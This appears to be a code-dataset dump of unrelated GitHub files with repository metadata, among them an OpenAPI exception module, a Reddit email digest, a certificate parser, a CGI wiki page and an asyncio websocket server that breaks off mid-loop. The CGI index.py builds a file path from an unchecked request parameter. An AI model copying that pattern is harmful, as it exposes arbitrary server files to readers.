path_to_item (list) the path to the exception in the
received_data dict. None if unset
"""
self.path_to_item = path_to_item
full_msg = msg
if path_to_item:
full_msg = "{0} at {1}".format(msg, render_path(path_to_item))
super(ApiValueError, self).__init__(full_msg)
class ApiKeyError(OpenApiException, KeyError):
def __init__(self, msg, path_to_item=None):
"""
Args:
msg (str): the exception message
Keyword Args:
path_to_item (None/list) the path to the exception in the
received_data dict
"""
self.path_to_item = path_to_item
full_msg = msg
if path_to_item:
full_msg = "{0} at {1}".format(msg, render_path(path_to_item))
super(ApiKeyError, self).__init__(full_msg)
class ApiException(OpenApiException):
def __init__(self, status=None, reason=None, http_resp=None):
if http_resp:
self.status = http_resp.status
self.reason = http_resp.reason
self.body = http_resp.data
self.headers = http_resp.getheaders()
else:
self.status = status
self.reason = reason
self.body = None
self.headers = None
def __str__(self):
"""Custom error messages for exception"""
error_message = "({0})\n"\
"Reason: {1}\n".format(self.status, self.reason)
if self.headers:
error_message += "HTTP response headers: {0}\n".format(
self.headers)
if self.body:
error_message += "HTTP response body: {0}\n".format(self.body)
return error_message
def render_path(path_to_item):
"""Returns a string representation of a path"""
result = ""
for pth in path_to_item:
if isinstance(pth, six.integer_types):
result += "[{0}]".format(pth)
else:
result += "['{0}']".format(pth)
return result
| [
"iyi@snapchat.com"
] | iyi@snapchat.com |
a6fd335e1fab30bfd003446f4f96dc56ec322e38 | 0c08d190ebf4ac4469f1e5931171b84916d0ada8 | /Assignment 2/Static Slicing/main.py | a530f3e9d4e7431ada82f1bd3fc7b4aedfe992c5 | [] | no_license | Janahan10/SOFE-3980-Assignments | 95ef56c01c02a1125fcddb1b9ad58b376cf0066f | a2830b4da3f110e82e031384f46a5200809ab154 | refs/heads/main | 2023-03-30T22:15:41.680013 | 2021-03-28T17:42:44 | 2021-03-28T17:42:44 | 343,180,490 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 325 | py | #!/usr/bin/python
import sys
def parse(statement, cur_line):
if statement in cur_line:
return True
return False
file = open("Source.txt", "r")
line_number = 1
for line in file:
if parse(sys.argv[1], line):
print('line ', line_number, ':', line.strip())
line_number += 1
file.close()
| [
"janahanravi10@gmail.com"
] | janahanravi10@gmail.com |
5bfc7e94eef873db0f1be62c6ed282820f1cecc0 | 96cba510d390756372ba32ac8e7893db283f1c22 | /index.py | a14f38f37eb6899a16614fb171649c00ea355912 | [] | no_license | tjdnws1201/web2-python | f71f505ced95352eead5ca26d924535fbdc10542 | a4bf85df37ba2f3944dc9c9576580e501e3c0d37 | refs/heads/master | 2021-01-01T13:29:18.457819 | 2020-02-24T16:30:24 | 2020-02-24T16:30:24 | 239,299,630 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,279 | py | #!python
print("Content-Type: text/html") # HTML is following
print()
import cgi, os, view, html_sanitizer
sanitizer = html_sanitizer.Sanitizer()
form = cgi.FieldStorage()
if 'id' in form:
title = pageId = form["id"].value
description = open('data/'+pageId,'r').read()
title = sanitizer.sanitize(title)
description = sanitizer.sanitize(description)
update_link = '<a href="update.py?id={}">update</a>'.format(pageId)
delete_action = '''
<form action="process_delete.py" method="post">
<input type="hidden" name="pageId" value="{}">
<input type="submit" value="delete">
</form>
'''.format(pageId)
else:
title = pageId = 'Welcome'
description = 'Hello, web'
update_link = ''
delete_action = ''
print('''<!doctype html>
<html>
<head>
<title>WEB - WELCOME</title>
<meta charset="utf-8">
</head>
<body>
<h1><a href="index.py">WEB</a></h1>
<ol>
{listStr}
</ol>
<a href="create.py">create</a>
{update_link}
{delete_action}
<h2>{title}</h2>
<p>{desc}</p>
</body>
</html>'''.format(
title=title,
desc=description,
listStr=view.getList(),
update_link=update_link,
delete_action=delete_action)
) | [
"noreply@github.com"
] | tjdnws1201.noreply@github.com |
cafc4911927a1bc3db70b0421caa2bd1947264dc | 5928d9dcf1ff48f5c9d1a491fd170886d4af4b9e | /walltime1s/time_diff.py | 2d35bd10713fac06055fb9354a1c9da5a913e757 | [] | no_license | xyongcn/qemu-tprof | 1ad76dd166eea692487153359c1d61a237eeb42c | 7c30f139e2d662d2bbc6d3a0925053b194f4e3bc | refs/heads/master | 2016-09-05T21:15:59.188610 | 2014-12-15T07:58:06 | 2014-12-15T07:58:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 446 | py | #!/usr/bin/python
import sys
log=sys.stdin
def get_tusec(p_line):
words=line.split(":")
words2=words[1].split(",")
sec=words2[0].strip()
usec=words2[1].strip()
tusec=int(sec)*1000000+int(usec)
return tusec
line=log.readline()
t1=get_tusec(line)
while True:
line=log.readline()
if not line : break
t2=get_tusec(line)
#print str(t2)+","+str(t1)+","+str(t2-t1)
print (t2-t1-1000000)/1000.0
t1=t2
| [
"myming@ubuntu-xyong.(none)"
] | myming@ubuntu-xyong.(none) |
cc4ca8bee5f7c9548c5afea6850d0cc031ab24e8 | 4cd5d0ed28ae52277ba904ea70eb9ac234eced0c | /RedditDigest.py | 7072fd945ea5716f6272005fe9da061b6df0fb76 | [] | no_license | LiamHz/AutoPy | b30f672c69fb96e501d3434b28f6dd224546c39f | 9be71fea5e33a8cb715d407d91ea1eced177eca0 | refs/heads/master | 2021-07-08T12:47:02.485285 | 2019-03-06T16:47:37 | 2019-03-06T16:47:37 | 142,188,514 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,450 | py | # Send the top posts of the past day from selected subreddits
import praw
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
# Read user credentials from external file
f = open("AuthenticationCredentials.txt","r")
lines = f.read().splitlines()
EMAIL_USERNAME = lines[1]
EMAIL_PASSWORD = lines[2]
REDDIT_USERNAME = lines[5]
REDDIT_PASSWORD = lines[6]
API_USERNAME = lines[9]
API_PASSWORD = lines[10]
f.close()
submissions = []
reddit = praw.Reddit(client_id=API_USERNAME,
client_secret=API_PASSWORD,
password=REDDIT_PASSWORD,
username=REDDIT_USERNAME,
user_agent='RedditDigest')
# How many posts to send from each subreddit
subredditLimit = 2
# Selected subreddits
subreddits = ['MachineLearning', 'WorldNews', 'Technology', 'Science', 'TodayILearned']
# 'Pics', 'MostBeautiful', 'EarthPorn']
for SR in subreddits:
count = 1
subreddit = reddit.subreddit(SR)
submissions.append(("<h2>{}</h2> \n").format(SR))
for submission in subreddit.top(time_filter='day', limit=subredditLimit):
submissions.append("<div> \n")
submissions.append(("<a href='{}'> \n").format(submission.url))
submissions.append(("<p>{}</p> \n").format(submission.title))
submissions.append("</a> \n")
submissions.append("</div> \n")
submissions.append("<br class='mobile'> \n")
submissions.append("<br> \n")
# Email results to self
fromaddr = EMAIL_USERNAME
toaddr = EMAIL_USERNAME
# Create message container
msg = MIMEMultipart('alternative')
msg['From'] = fromaddr
msg['To'] = toaddr
msg['Subject'] = "Reddit Digest"
# Plain text version of email
s = ''
formatted_submissions = s.join(submissions)
# HTML version of email
html = """\
<html>
<head>
<style>
@media only screen and (min-width:800px) {{
.mobile {{display: none !important;}}
}}
</style>
</head>
<body>
{}
</body>
</html>
""".format(formatted_submissions)
# Allow Unicode characters to be emailed
plainText = MIMEText(formatted_submissions.encode('utf-8'), 'plain', 'UTF-8')
html = MIMEText(html, 'html')
msg.attach(plainText)
msg.attach(html)
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login(fromaddr, EMAIL_PASSWORD)
server.sendmail(fromaddr, toaddr, msg.as_string())
server.quit()
| [
"liam.hinzman@gmail.com"
] | liam.hinzman@gmail.com |
b0e91394bff1be5dfe354c640ced42e3fac6041c | e46c52607c763675e00182c5bdd3bb61ce0c6f48 | /lib/core/cert.py | b493f50f3bce4da1b182a21e7d05e5fae694e18c | [] | no_license | atlassion/PacketSenderLite | a610833380b19c59b3ae3a7de49fbd03fffffa28 | 3ff9db1e791deedfb2d7c638f94cd9cb5daa4a63 | refs/heads/master | 2023-06-09T15:03:28.278597 | 2021-06-22T11:49:08 | 2021-06-22T11:49:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,659 | py | from hashlib import sha256, sha1, md5
from typing import List
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.x509 import Certificate
__all__ = ['convert_bytes_to_cert', 'get_certificate_domains']
# noinspection PyUnresolvedReferences,PyProtectedMember,PyBroadException
def convert_bytes_to_cert(bytes_cert: bytes) -> dict:
cert = None
try:
cert = x509.load_der_x509_certificate(bytes_cert, default_backend())
except BaseException:
try:
cert = x509.load_pem_x509_certificate(bytes_cert, default_backend())
except BaseException:
pass
if cert:
result = {}
serial_number = cert.serial_number
issuer = cert.issuer
try:
result['validity'] = {}
result['validity']['end_datetime'] = cert.not_valid_after
result['validity']['start_datetime'] = cert.not_valid_before
result['validity']['end'] = result['validity']['end_datetime'].strftime('%Y-%m-%dT%H:%M:%SZ')
result['validity']['start'] = result['validity']['start_datetime'].strftime('%Y-%m-%dT%H:%M:%SZ')
except Exception:
pass
result['issuer'] = {}
dict_replace = {
'countryName': 'country',
'organizationName': 'organization',
'commonName': 'common_name'
}
try:
for n in issuer.rdns:
z = n._attributes[0]
name_k = z.oid._name
value = z.value
if name_k in dict_replace:
result['issuer'][dict_replace[name_k]] = [value]
except Exception:
pass
try:
if 'v' in cert.version.name:
result['version'] = cert.version.name.split('v')[1].strip()
except BaseException:
result['version'] = str(cert.version.value)
dnss = get_certificate_domains(cert)
atr = cert.subject._attributes
result['subject'] = {}
for i in atr:
for q in i._attributes:
result['subject'][q.oid._name] = [q.value]
if 'serialNumber' in list(result.keys()):
if len(result['serialNumber']) == 16:
result['serialNumber'] = '00' + result['serialNumber']
try:
result['serialNumber_int'] = int('0x' + result['serialNumber'], 16)
result['serial_number'] = str(result['serialNumber_int'])
except BaseException:
result['serialNumber_int'] = 0
result['names'] = dnss
if result['serialNumber_int'] == 0:
result['serial_number'] = str(serial_number)
result['serial_number_hex'] = str(hex(serial_number))
result['raw_serial'] = str(serial_number)
hashs = {
'fingerprint_sha256': sha256,
'fingerprint_sha1': sha1,
'fingerprint_md5': md5
}
for namehash, func in hashs.items():
hm = func()
hm.update(bytes_cert)
result[namehash] = hm.hexdigest()
remove_keys = ['serialNumber_int']
for key in remove_keys:
result.pop(key)
return result
# noinspection PyBroadException
def get_certificate_domains(cert: Certificate) -> List[str]:
"""
Gets a list of all Subject Alternative Names in the specified certificate.
"""
try:
for ext in cert.extensions:
ext = ext.value
if isinstance(ext, x509.SubjectAlternativeName):
return ext.get_values_for_type(x509.DNSName)
except BaseException:
return []
| [
"shadow.bfs@gmail.com"
] | shadow.bfs@gmail.com |
7cc1e02baa1ff8a47e4b543d8df9d4f42f3110fc | 2ea2631c1c7fd49d5c177f4b804b8470bdd62a82 | /sievePlot.py | 707c12b294296830c2404c227e276f6c54faeee4 | [] | no_license | Shichimenchou/CS4700FinalProject | abf733e83ee248eff98bb8ca6bc1d0d6a8e772fa | b80480bae028c714b5c8f812e2aa587c3f1092e4 | refs/heads/master | 2022-04-23T20:29:59.202388 | 2020-04-28T05:34:10 | 2020-04-28T05:34:10 | 259,216,985 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 695 | py | from pylab import *
t = arange(10, 31)
cpp = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 2, 4, 9, 20, 41, 83, 173]
julia = [0.000038, 0.000065, 0.00012, 0.00027, 0.00058, 0.0011, 0.0021, 0.0048, 0.0084, 0.018, 0.041, 0.094, 0.21, 0.61, 1.03, 2.05, 4.21, 9.77, 26.62, 76.77, 379.12]
python = [0.00025, 0.00058, 0.0010, 0.0021, 0.0046, 0.009, 0.018, 0.038, 0.076, 0.16, 0.35, 0.76, 1.58, 3.44, 6.90, 14.43, 29.38, 59.28, 121.00, 266.12, 559.05]
print(len(cpp))
print(len(julia))
print(len(python))
plot(t, cpp, label="C++")
plot(t, julia, label="Julia")
plot(t, python, label="Python")
legend()
xlabel("Order (2^x)")
ylabel("Time (s)")
title("Sieve of Eratosthenes")
grid(True)
legend()
show()
| [
"linsonphillip@yahoo.com"
] | linsonphillip@yahoo.com |
54efaf34fa4aca4b31c9b4fe6d36b5dd4d65d9f7 | 14e6cf117d502517805639ee5850ec4a78654765 | /backend/bestdeal/urls.py | e0372b2dacb48c1dced46fd457e18a6f81846225 | [] | no_license | viikt0r/pythonproject | cf05590b20798bbc12985f30eabf2970d262a5d1 | e7d9f49fdf206f297641fada0a861f1e307cd4b3 | refs/heads/master | 2023-01-06T00:43:27.587484 | 2019-06-05T17:16:19 | 2019-06-05T17:16:19 | 157,125,370 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 626 | py | from os import listdir
from os.path import join, isdir
from django.urls import path, include
from pythonproject.settings import BASE_DIR
from rest_framework_swagger.views import get_swagger_view
schema_view = get_swagger_view(title='Bestdeal API')
API_DIR = 'bestdeal/api/'
entities = [directory
for directory in listdir(join(BASE_DIR, API_DIR))
if (isdir(join(BASE_DIR, API_DIR, directory))
and directory != '__pycache__')]
urlpatterns = [
path('', include('bestdeal.api.{}.urls'.format(entity)))
for entity in entities
]
urlpatterns += [
path('docs/', schema_view),
] | [
"esteve.viktor@gmail.com"
] | esteve.viktor@gmail.com |
31affbaa13b3b6dbe80804986e0fff5b1236c8cd | 63e903bd5448de49d666d00ae1cef76ba7e41b93 | /venv/Scripts/pip3.8-script.py | 986a0efffcb314557212eb151bb063f4e90a870c | [] | no_license | North-Poplar/untitled1 | 0958c01dfa92700876fd6a97a206cbd6c52175a2 | 06b1b025a7a2f66ce1d81a9e4ec1e164259cdb3a | refs/heads/master | 2022-11-11T18:21:33.833494 | 2020-07-04T14:55:54 | 2020-07-04T14:55:54 | 277,105,098 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 419 | py | #!C:\Users\18505\PycharmProjects\untitled1\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3.8'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3.8')()
)
| [
"2481253805@qq.com"
] | 2481253805@qq.com |
e139bb21e3e65931f79037851b518967a20f1bdf | 6ce7ec83576e8021d050f86cd4c696a142f1798a | /final_exam/02.problem.py | 3bca39f6d99a95ed5fcbb067e335e57b32331afe | [] | no_license | Nanko-Nanev/fundamentals | 2707e20900dc779b96d453c978e8e74f1fb86fa4 | f46a655ff32bbfe6f3afeb4f3ab1fddc7a0edc89 | refs/heads/main | 2023-02-09T18:39:55.305854 | 2021-01-07T10:30:37 | 2021-01-07T10:30:37 | 326,507,304 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 470 | py | import re
pattern = r"^(\$|%)(?P<tag>[A-Z]{1}[a-z]+)\1:\s\[(?P<t1>[0-9]+)\]\|\[(?P<t2>[0-9]+)\]\|\[(?P<t3>[0-9]+)\]\|"
n = int(input())
for i in range(n):
data = input()
result = re.match(pattern, data)
if result:
obj = result.groupdict()
tag = (obj['tag'])
a = chr(int(obj['t1']))
b = chr(int(obj['t2']))
c = chr(int(obj['t3']))
print(f"{tag}: {a}{b}{c}")
else:
print(f"Valid message not found!") | [
"75886522+Nanko-Nanev@users.noreply.github.com"
] | 75886522+Nanko-Nanev@users.noreply.github.com |
3d07439a0606060f4f49825121ce14c2c92590b0 | e6c506beafef296be2f60c3809b36c96c7374224 | /左旋转字符串.py | 87a697603b995532a2bcc0e42f07e4a2dc49236e | [] | no_license | Liubasara/pratice_code | d435c982379e377e3cb657d77e207f4f51f5e3b5 | 353363780b0918802e9457aee8ec2a8acc0c24fb | refs/heads/master | 2023-08-18T01:29:00.676510 | 2023-08-10T11:09:11 | 2023-08-10T11:09:11 | 137,707,904 | 0 | 0 | null | 2023-01-08T07:34:21 | 2018-06-18T03:54:33 | JavaScript | UTF-8 | Python | false | false | 72 | py |
if __name__ == "__main__":
a = [1,2,3,4,5,6]
print a[1:]+a[:1] | [
"followsin@gami.com"
] | followsin@gami.com |
a5b48a72bcda4d1aa680865c3ef883043afe3f26 | ff01890e8c6090cd7519da93a96d96a11235ec94 | /utils/flow_resolver/protocol.py | 74c97372118610e128a1103c7b503297c8b19ec5 | [
"Apache-2.0"
] | permissive | DeckerCHAN/shadowsocks | 707fbd19448919462bf9249c0e8feb557b9db1dc | 29afedb748b0ca2051def24b3bed430f522b4adf | refs/heads/master | 2021-01-15T21:30:02.355942 | 2015-05-09T05:09:49 | 2015-05-09T05:09:49 | 32,707,288 | 0 | 0 | null | 2015-03-23T02:38:19 | 2015-03-23T02:38:19 | null | UTF-8 | Python | false | false | 100 | py | __author__ = 'Decker'
class ProtocolType:
TCP = 1,
UDP = 2,
HTTP = 3,
UNKNOWN = -1 | [
"DeckerCHAN@gmail.com"
] | DeckerCHAN@gmail.com |
3586db050a69dcf9aa2c251478a20d1daa1a8560 | 7eed53aaefbac57b374b31946ea2b26ff55e0e44 | /scripts/poc-7segment.py | d165774207b3d24e307b319de89e547f22bcc962 | [] | no_license | Nickardson/tracy-the-turtle-projects | 580b268a7ab3b9abc47c343a1e7cf4462ffc746b | 0545c2cd42b6a22544794b207ac2bc51475268da | refs/heads/master | 2022-12-12T07:54:19.942076 | 2020-03-06T01:01:56 | 2020-03-06T01:01:56 | 237,668,470 | 0 | 0 | null | 2022-12-11T22:53:59 | 2020-02-01T19:45:42 | Python | UTF-8 | Python | false | false | 2,182 | py | from turtle import Screen, Turtle
screen = Screen()
screen.setup(950, 200)
screen.register_shape('segment', ((-14.5, 0), (-12, 2.5), (12, 2.5), (14.5, 0), (12, -2.5), (-12, -2.5))) # <=>
SCALE = 1.75 # arbitrarily scale digits larger or smaller
CURSOR_SIZE = 25 # maximum dimension of our custom turtle cursor
SPACING = CURSOR_SIZE * 1.25 * SCALE # space from start of one digit to the next
DIGITS = { # which segments to turn on encoded as bits
'0': 0b1111110,
'1': 0b0110000,
'2': 0b1101101,
'3': 0b1111001,
'4': 0b0110011,
'5': 0b1011011,
'6': 0b1011111,
'7': 0b1110000,
'8': 0b1111111,
'9': 0b1111011,
'A': 0b1110111,
'B': 0b0011111,
'C': 0b1001110,
'D': 0b0111101,
'E': 0b1001111,
'F': 0b1000111,
}
def display_number(turtle, number):
for digit in str(number):
bits = DIGITS[digit]
for bit in range(7):
if 2 ** bit & bits:
position = turtle.position()
segments[bit](turtle)
turtle.stamp()
turtle.setheading(0)
turtle.setposition(position)
turtle.forward(SPACING)
def segment_A(turtle): # top
turtle.setheading(90)
turtle.sety(turtle.ycor() + 20 * SCALE)
def segment_B(turtle): # right upper
turtle.setposition(turtle.xcor() + 10 * SCALE, turtle.ycor() + 10 * SCALE)
def segment_C(turtle): # right lower
turtle.setposition(turtle.xcor() + 10 * SCALE, turtle.ycor() - 10 * SCALE)
def segment_D(turtle): # bottom
turtle.setheading(90)
turtle.sety(turtle.ycor() - 20 * SCALE)
def segment_E(turtle): # left lower
turtle.setposition(turtle.xcor() - 10 * SCALE, turtle.ycor() - 10 * SCALE)
def segment_F(turtle): # left upper
turtle.setposition(turtle.xcor() - 10 * SCALE, turtle.ycor() + 10 * SCALE)
def segment_G(turtle): # center
turtle.setheading(90)
segments = [segment_G, segment_F, segment_E, segment_D, segment_C, segment_B, segment_A]
digits = Turtle('segment', False)
digits.speed('fastest')
digits.shape('segment')
digits.penup()
digits.setx(SPACING - screen.window_width() / 2)
display_number(digits, "0123456789ABCDEF")
| [
"taylorgratzer@yahoo.com"
] | taylorgratzer@yahoo.com |
bc74fafeb39a89942c02e53e1e406997948fc37a | d78e6d49aeb50b9a408ed0d423e96df3be7850e3 | /prototypes_v1/ui_v0/server/env/bin/flask | 2a0105ea5ea486926b7b370d5e8891df932ff422 | [] | no_license | jdunjords/birds-iview | 77e3fb0815d10fbf971c10b7b28c99a947ef628c | e8da36a46f49827eebf16b6acbb6b3967de41f4c | refs/heads/master | 2023-03-06T06:23:43.801460 | 2021-02-09T01:35:47 | 2021-02-09T01:35:47 | 295,505,143 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 265 | #!/Users/jordancolebank/Desktop/programming/capstone/server/env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from flask.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"jordancolebank@Jordans-MacBook-Air-3.local"
] | jordancolebank@Jordans-MacBook-Air-3.local | |
0a6a1c337560a7be7affe868a65af85fb574f072 | 15581a76b36eab6062e71d4e5641cdfaf768b697 | /LeetCode_30days_challenge/2021/February/Peeking Iterator.py | 1c47322e8ae397e80fa7c43ca73eea44f3a2c292 | [] | no_license | MarianDanaila/Competitive-Programming | dd61298cc02ca3556ebc3394e8d635b57f58b4d2 | 3c5a662e931a5aa1934fba74b249bce65a5d75e2 | refs/heads/master | 2023-05-25T20:03:18.468713 | 2023-05-16T21:45:08 | 2023-05-16T21:45:08 | 254,296,597 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,642 | py | # Below is the interface for Iterator, which is already defined for you.
#
# class Iterator:
# def __init__(self, nums):
# """
# Initializes an iterator object to the beginning of a list.
# :type nums: List[int]
# """
#
# def hasNext(self):
# """
# Returns true if the iteration has more elements.
# :rtype: bool
# """
#
# def next(self):
# """
# Returns the next element in the iteration.
# :rtype: int
# """
class PeekingIterator:
def __init__(self, iterator):
"""
Initialize your data structure here.
:type iterator: Iterator
"""
self.iterator = iterator
if self.iterator.hasNext():
self.buffer = self.iterator.next()
else:
self.buffer = None
def peek(self):
"""
Returns the next element in the iteration without advancing the iterator.
:rtype: int
"""
return self.buffer
def next(self):
"""
:rtype: int
"""
tmp = self.buffer
if self.iterator.hasNext():
self.buffer = self.iterator.next()
else:
self.buffer = None
return tmp
def hasNext(self):
"""
:rtype: bool
"""
return self.buffer is not None
# Your PeekingIterator object will be instantiated and called as such:
# iter = PeekingIterator(Iterator(nums))
# while iter.hasNext():
# val = iter.peek() # Get the next element but not advance the iterator.
# iter.next() # Should return the same value as [val].
| [
"mariandanaila01@gmail.com"
] | mariandanaila01@gmail.com |
2c535cfcb097e6b1a7f0880f3a022b2d331efe16 | b6c6d71b2c0c00540a6387ddd1e27db096d2f442 | /AIlab/certainty_facor.py | 85096f6a6ca860f1b181765f697481ee593bca29 | [] | no_license | raghavdasila/General-programs | 26bb5daddd054f8e6d56924ecb87884e687c8a53 | a9f2899ad2b048291793bbdf3dac808b571f9f13 | refs/heads/master | 2021-07-07T05:30:52.374798 | 2017-10-05T04:40:17 | 2017-10-05T04:40:17 | 104,132,884 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 636 | py | if __name__=="__main__":
print "Medicine Accuracy Testing (Enter percentages)"
print "Enter sensitivity"
se=float(raw_input())/100.0
print "Enter Specificity"
sp=float(raw_input())/100.0
print "Enter percentage of users"
up=float(raw_input())/100.0
print "Enter population"
p=float(raw_input())
pv=(se*up)/(se*up+(1.0-up)*(1.0-se))
nv=(sp*up)/(sp*up+(1.0-up)*(1.0-sp))
n_users=up*p
users=p-n_users
cf1=int(pv*p)
cf2=int(nv*p)
print "Positive's certainty factor, people:",pv,cf1
print "Negative's certainty factor, people:",nv,cf2
print "Medicine suitable for people?"
if pv<.7 or nv<.7:print "NO"
else:print "YES"
| [
"noreply@github.com"
] | raghavdasila.noreply@github.com |
12772ef7ee948e7a258e8f3156c4960d0078d2b9 | 37ca51c6c0b21b9b6efbc437bca34f433384ffee | /solution/bit_map/no_16_power.py | e7912d98fad93dc217ff4e334db2a44507a87e3a | [
"MIT"
] | permissive | LibertyDream/algorithm_data_structure | 2ea83444c55660538356901472654703c7142ab9 | 5d143d04d001a9b8aef30334881d0af56d8c9850 | refs/heads/master | 2020-05-18T00:52:59.457481 | 2019-12-31T09:21:46 | 2019-12-31T09:21:46 | 184,074,211 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,165 | py | '''面试题16:数值的整数次方
实现函数 double Power(double base,int exponent),求base的exponent次方。
不得使用库函数,同时不需要考虑大数问题
-------------
Example
input:2,3
output:8
---------------
功能、边界、负面测试,错误返回方式
'''
def power(base:float, exponent:int):
if not isinstance(exponent, int):
raise TypeError('exponent must be an integer')
if abs(base - 0.0) < 1e-9 and exponent < 0:
raise ValueError('base is 0, exponent cannot be negative')
if exponent >= 0:
return __unsinged_power(base, exponent)
else:
return 1.0 / __unsinged_power(base,abs(exponent))
def __unsinged_power(base, exponent):
if exponent == 0:
return 1
if exponent == 1:
return base
res = __unsinged_power(base, exponent >> 1)
res *= res
if (exponent & 0b1) == 1:
res *= base
return res
if __name__ == "__main__":
datas = [[2,3],[2,-1],[2,0],[-2,3],[-2,-2],[-2,0],[0,3],[0,0],[.5,2],[.5,0],[.5,-2]]
for data in datas:
print('power(%f,%d):%f'%(data[0],data[1],power(data[0],data[1])))
| [
"mfx660@163.com"
] | mfx660@163.com |
a50627fd3992ca3c5b4930f7a1ab9aff7f483375 | d08dc239a3eda6de61be9c128976bb6d199a6721 | /final_project/image_search/search_img/server.py | 6fd6f1183bcfe59602119754c5dd3cf19b96efdd | [] | no_license | NataKuskova/vagrant-final_project | 7ac87ec4623a4a30b9d225a58f83cf7b9f37407d | d3f624a99c3d1d65d0321f8e90070c847e7b8cd3 | refs/heads/master | 2021-01-11T00:52:58.463215 | 2016-10-10T07:09:19 | 2016-10-10T07:09:19 | 70,456,312 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,320 | py | from autobahn.asyncio.websocket import WebSocketServerProtocol, \
WebSocketServerFactory
import asyncio
import asyncio_redis
import logging
import json
FORMAT = u'%(filename)s[LINE:%(lineno)d]# %(levelname)-8s ' \
u'[%(asctime)s] %(message)s'
logging.basicConfig(format=FORMAT, level=logging.DEBUG) # filename=u'../logs.log'
class WebSocketFactory(WebSocketServerFactory):
"""
Class for asyncio-based WebSocket server factories.
"""
_search_engines = {'google': {},
'yandex': {},
'instagram': {}
}
sites = ['google',
'yandex',
'instagram'
]
def register_client(self, tag, id_connection, instance):
"""
Adds a client to a list.
Args:
tag: ...
id_connection: Address of the client.
instance: Instance of the class Server Protocol.
"""
# self._tags[tag].setdefault(id_connection, instance)
# self._tags.setdefault(tag, {id_connection: instance})
# if tag not in self._tags:
# self._tags[tag] = [{id_connection: instance}]
# else:
# tags = self._tags[tag]
# self._tags[tag] = []
# self._tags[tag] = tags
# self._tags[tag] += [{id_connection: instance}]
for site in self.sites:
self._search_engines[site].setdefault(tag, {
'address': {id_connection: instance}, 'counter': False})
for site in self.sites:
self._search_engines[site][tag][
'address'].setdefault(id_connection, instance)
# print(self._search_engines)
def get_tags(self, channel, tag):
"""
Receives the client instance.
Args:
id_connection: Address of the client.
Returns:
The client instance.
"""
return self._search_engines[channel][tag]
def unregister_client(self, id_connection):
"""
Removes the client from the list when a connection is closed.
Args:
id_connection: Address of the client.
"""
# print('before')
# print(self._search_engines)
for site in self.sites:
for tag in self._search_engines[site]:
# print(self._search_engines[site][tag]['address'])
if id_connection in self._search_engines[site][tag]['address']:
del self._search_engines[site][tag]['address'][id_connection]
# if not self._search_engines[site][tag]['address']:
# del self._search_engines[site][tag]
# print('in--------')
# print(self._search_engines)
# self._search_engines[site] = {k: v for k, v in
# self._search_engines[site].items() if v['counter']}
self._search_engines[site] = {k: v for k, v in
self._search_engines[site].items() if
v['address']}
# print('after')
# print(self._search_engines)
# for tag, client in self._tags.items():
# if id_connection in client:
# del(self._tags[tag][id_connection])
# self._tags = {k: v for k, v in self._tags.items() if not v}
logging.info('Connection {0} is closed.'.format(id_connection))
class ServerProtocol(WebSocketServerProtocol):
"""
Class for asyncio-based WebSocket server protocols.
"""
def onConnect(self, request):
"""
Callback fired during WebSocket opening handshake when a client
connects (to a server with request from client) or when server
connection established (by a client with response from server).
This method may run asynchronous code.
Adds a client to a list.
Args:
request: WebSocket connection request information.
"""
logging.info("Client connecting: {0}".format(request.peer))
# self.factory.register_client(request.peer, self)
# global tags
# tags = request.peer
def onOpen(self):
"""
Callback fired when the initial WebSocket opening handshake was
completed.
Sends a WebSocket message to the client with its address.
"""
logging.info("WebSocket connection open.")
# self.sendMessage(clients.encode('utf8'), False)
def onMessage(self, payload, isBinary):
"""
Callback fired when a complete WebSocket message was received.
Saved the client address.
Args:
payload: The WebSocket message received.
isBinary: `True` if payload is binary, else the payload
is UTF-8 encoded text.
"""
logging.info("Message received: {0}".format(payload.decode('utf8')))
# self.sendMessage(payload, isBinary)
# global clients
# clients = payload.decode('utf8')
self.factory.register_client(payload.decode('utf8'), self.peer, self)
def onClose(self, wasClean, code, reason):
"""
Callback fired when the WebSocket connection has been closed
(WebSocket closing handshake has been finished or the connection
was closed uncleanly).
Removes the client from the list.
Args:
wasClean: `True` if the WebSocket connection was closed cleanly.
code: Close status code as sent by the WebSocket peer.
reason: Close reason as sent by the WebSocket peer.
"""
factory.unregister_client(self.peer)
logging.info("WebSocket connection closed: {0}".format(reason))
@asyncio.coroutine
def run_subscriber():
"""
Asynchronous Redis client. Start a pubsub listener.
It receives signals from the spiders and sends a message to the client.
"""
# Create connection
connection = yield from asyncio_redis.Connection.create(
host='localhost', port=6379)
# Create subscriber.
subscriber = yield from connection.start_subscribe()
# Subscribe to channel.
yield from subscriber.subscribe(['google',
'yandex',
'instagram'
])
spiders = []
# Inside a while loop, wait for incoming events.
while True:
reply = yield from subscriber.next_published()
key_dict = factory.get_tags(reply.channel, reply.value)
key_dict['counter'] = True
if factory.get_tags('google', reply.value)['counter'] \
and factory.get_tags('yandex', reply.value)['counter'] \
and factory.get_tags('instagram', reply.value)['counter']:
